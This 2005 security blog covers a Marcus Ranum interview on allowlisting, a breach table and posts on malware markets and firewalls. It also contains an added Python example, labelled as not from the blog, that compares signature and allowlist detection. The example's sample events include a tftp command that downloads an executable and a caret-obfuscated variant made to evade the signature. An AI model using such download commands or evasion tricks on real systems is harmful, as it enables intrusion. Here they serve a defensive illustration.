6.23.2005
Fantastic Interview
Must-read interview with Marcus Ranum, a major player in the security world, at Security Focus. He has several excellent comments on the state of the industry and on some of the fundamental issues that still plague network security. The question and his answer:

Do you see any new, interesting, or promising path for network security?
Nope! I see very little that's new and even less that's interesting. The truth is that most of the problems in network security were fairly well-understood by the late 1980's. What's happening is that the same ideas keep cropping up over and over again in different forms. For example, how many times are we going to re-invent the idea of signature-based detection? Anti-virus, Intrusion detection, Intrusion Prevention, Deep Packet Inspection - they all do the same thing: try to enumerate all the bad things that can happen to a computer. It makes more sense to try to enumerate the good things that a computer should be allowed to do.
I believe we're making zero progress in computer security, and have been making zero progress for quite some time. Consider this: it's 2005 and people still get viruses. How much progress are we making, really? If we can't get a handle on relatively simple problems such as controlled execution and filesystem/kernel permissions, how much progress are we going to make on the really hard problems of security, such as dealing with transitive trust? It's 2005, and IT managers still don't seem to know how to build networks that don't collapse when a worm gets loose on them. Security thinkers realized back in the early 80's that networks were a good medium for attack propagation and that networks would need to be broken into separate security domains with gateways between them. None of this is rocket science - I think that what we're seeing today is the results of this massive exuberance in the late 1990's in which everyone rushed to put all their mission critical assets onto these poorly protected networks that they then hooked to the Internet. That was a dumb idea, and that fact just hasn't sunk in, yet.
posted by mt at 12:33
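Ranum's contrast between enumerating the bad things and enumerating the good things is easy to show in code. The following is an added example, not code from the interview or from this blog: it runs a signature (blocklist) engine and a default-deny parent/child allowlist over a handful of constructed process-creation events. The paths, the policy table and the events are all made up for illustration; the caret-obfuscated command line in event 3 is a real cmd.exe trick and is there to show the signature missing a trivially mutated variant, while event 4 shows the cost of the allowlist approach (a legitimate but unregistered tool gets flagged).

```python
"""Blocklist (signature) vs allowlist (default-deny) detection over process events.

Added example; the events, paths and policy below are constructed, not taken
from the page or from any real environment.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    image: str     # path of the newly created process
    parent: str    # path of the process that spawned it
    cmdline: str   # command line as logged


# Constructed sample events. Event 2 is the known-bad pattern, event 3 the same
# action with cmd.exe caret obfuscation, event 4 a benign but unregistered tool.
EVENTS = [
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\services.exe",
              "svchost.exe -k netsvcs"),
    ProcEvent(r"C:\Program Files\Office\winword.exe", r"C:\Windows\explorer.exe",
              "winword.exe report.doc"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Program Files\Office\winword.exe",
              "cmd.exe /c tftp -i 10.0.0.5 GET dl.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Program Files\Office\winword.exe",
              "cmd.exe /c t^f^t^p -i 10.0.0.5 GET dl.exe"),
    ProcEvent(r"C:\Tools\backup.exe", r"C:\Windows\explorer.exe",
              "backup.exe --nightly"),
]

# "Enumerate the bad": one regex per command line already seen in an attack.
SIGNATURES = {
    "tftp-download": re.compile(r"\btftp\b.*\bGET\b", re.IGNORECASE),
}

# "Enumerate the good": which parent may spawn which child images (lower-cased).
# Anything not listed, including an unknown parent, is denied.
ALLOWED_CHILDREN = {
    r"c:\windows\system32\services.exe": {r"c:\windows\system32\svchost.exe"},
    r"c:\windows\explorer.exe": {r"c:\program files\office\winword.exe"},
    r"c:\program files\office\winword.exe": set(),   # Office never spawns anything
}


def signature_hits(events):
    """Return (event index, signature name) for every signature match."""
    hits = []
    for i, ev in enumerate(events):
        for name, rx in SIGNATURES.items():
            if rx.search(ev.cmdline):
                hits.append((i, name))
    return hits


def allowlist_violations(events, policy=ALLOWED_CHILDREN):
    """Return indices of events whose (parent, child) pair is not in the policy."""
    bad = []
    for i, ev in enumerate(events):
        allowed = policy.get(ev.parent.lower(), set())
        if ev.image.lower() not in allowed:
            bad.append(i)
    return bad


if __name__ == "__main__":
    print("signature hits:      ", signature_hits(EVENTS))       # [(2, 'tftp-download')]
    print("allowlist violations:", allowlist_violations(EVENTS))  # [2, 3, 4]
```

The signature fires once and is blind to the `t^f^t^p` variant; the allowlist catches both shell launches without knowing anything about tftp, because Word spawning a shell is simply not on the list. It also flags `backup.exe`, which is the trade-off: an allowlist is only as good as the effort spent keeping it current, which is exactly the "human side" that gets underfunded.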
Couple of things
Some quick items.
- New article should be up next week at Security Focus.
- We're working on a new product, somewhat in the security arena. It's a USB flash drive running Linux with several anonymizing features designed to protect identity and privacy. Small enough to bring everywhere and use when need be. Ghoststick. If you're interested in learning more, I suggest registering at the main site. No need to enter a real name, I never do ;). I promise no spam, just product-related updates. If you're interested in beta testing or have some thoughts/recommendations, send a comment here.
posted by mt at 11:57
ID Theft
Summary article from the Dallas Morning News. The incident list from the article is reproduced below: date, company, type of breach, number of IDs exposed.

Date | Company | Breach | # of IDs
Feb. 15 | ChoicePoint | ID thieves accessed | 145,000
Feb. 25 | Bank of America | Lost backup tape | 1,200,000
Feb. 25 | PayMaxx | Exposed online | 25,000
March 10 | LexisNexis | Passwords compromised | 32,000
March 11 | University of California, Berkeley | Stolen laptop | 98,400
March 11 | Boston College | Hacking | 120,000
March 12 | Nevada Department of Motor Vehicles | Stolen computer | 8,900
March 20 | Northwestern University | Hacking | 21,000
March 20 | University of Nevada, Las Vegas | Hacking | 5,000
March 22 | California State University, Chico | Hacking | 59,000
March 23 | University of California, San Francisco | Hacking | 7,000
March 28 | DSW/Retail Ventures | Hacking | 100,000
April | Georgia DMV | Dishonest insider | Hundreds of thousands
April 5 | MCI | Stolen laptop | 16,500
April 8 | San Jose Medical Group | Stolen computer | 185,000
April 11 | Tufts University | Hacking | 106,000
April 12 | LexisNexis | Passwords compromised | 280,000
April 14 | Polo Ralph Lauren/HSBC | Hacking | 180,000
April 14 | California FasTrak | Dishonest insider | 4,500
April 15 | California Department of Health Services | Stolen laptop | 21,600
April 18 | DSW/Retail Ventures | Hacking | 1,300,000
April 20 | Ameritrade | Lost backup tape | 200,000
April 21 | Carnegie Mellon University | Hacking | 19,000
April 26 | Michigan State University's Wharton Center | Hacking | 40,000
April 26 | Christus St. Joseph's Hospital | Stolen computer | 19,000
April 28 | Georgia Southern University | Hacking | Tens of thousands
April 28 | Wachovia, Bank of America, PNC Financial Services Group and Commerce Bancorp | Dishonest insiders | 676,000
April 29 | Oklahoma State University | Missing laptop | 37,000
May 2 | Time Warner | Lost backup tapes | 600,000
May 4 | Colorado Health Department | Stolen laptop | 1,600
May 5 | Purdue University | Hacker | 11,360
May 7 | Department of Justice | Stolen laptop | 80,000
May 11 | Stanford University | Hacker | 9,900
May 12 | Hinsdale (Ill.) Central High School | Hacker | 2,400
May 16 | Westborough Bank | Dishonest insider | 750
May 18 | Jackson (Mich.) Community College | Hacker | 8,000
May 19 | Valdosta State University | Hacker | 40,000
May 20 | Purdue University | Hacker | 11,000
May 22 | CardSystems | Hacker | 40,000,000
May 26 | Duke University | Hacker | 5,500
May 27 | Cleveland State University | Stolen laptop | 44,420
May 28 | Merlin Data Services | Bogus acct. set up | 9,000
May 30 | Motorola | Computers stolen | unknown
June 6 | CitiFinancial | Lost backup tapes | 3,900,000
June 10 | Federal Deposit Insurance Corp. | Not disclosed | 6,000
Total: About 50 million
posted by mt at 11:45
6.22.2005
The CC Blackmarket
A New York Times piece on the stolen identity trade. This quote from the former head of the DOJ's cyber investigations unit (now in the private sector) should make everyone cringe:

And, Mr. Rasch pointed out, it is nearly impossible to stop. For all the information that law enforcement and security experts can glean from sites like iaaca.com, "there are whole marketplaces of bulletin board systems and chats that are invisible," he said.

At least he's honest...
posted by mt at 15:10
6.21.2005
The Evolution of Malware
This article examines the history of malicious software and the direction it's headed. I found the piece below extremely accurate.

Another important factor is that those releasing the malware that introduce the backdoors will not necessarily be those that ultimately exploit the compromised systems. A supply chain is emerging. Botnet 'herders' will pay hackers for their botnets. Indeed, botnets are turning up in a marketplace -- with evidence of them even appearing on online auction sites. Your compromised system really can be sold to the highest bidder! The fact that the malware now effectively feeds off the infected system means that it now meets our third criterion of an effective parasite.
When considering where the money is being made, it is relevant to ask whose systems are getting compromised. Unsurprisingly, the answer is often those with the least ability to protect themselves -- such as small and medium enterprises and domestic users, all of whom often lack the money and expertise to tackle the problem effectively.
posted by mt at 13:44
Software firewalls
Interesting article on the risks of software firewalls. It's the second in a two-part series.

With this scenario in mind, and bearing in mind how an LSP Trojan works, the question we need to ask ourselves is: will the defensive measures in this network contain the attack? As we already know from the information we have discussed above, the firewall itself is woefully inadequate to protect against this type of exploit. However, the method of transfer would be detected as TFTP activity by any competent IDS out there today. The problem is that many of these other defensive appliances are rarely monitored. That is a sad but true statement in many cases. Furthermore, even when these appliances are monitored there is a strong possibility that the person who is reading the output does not have the requisite training, or knowledge, to understand the information they are seeing. In some cases, large networks receive hundreds of thousands of alerts every day.
The problem of an intrusion detection system going unmonitored, or misinterpreted is unfortunately an all too common one. Too many corporations invest in the technology yet do not invest in the human side of the equation to manage and monitor the equipment.
posted by mt at 13:38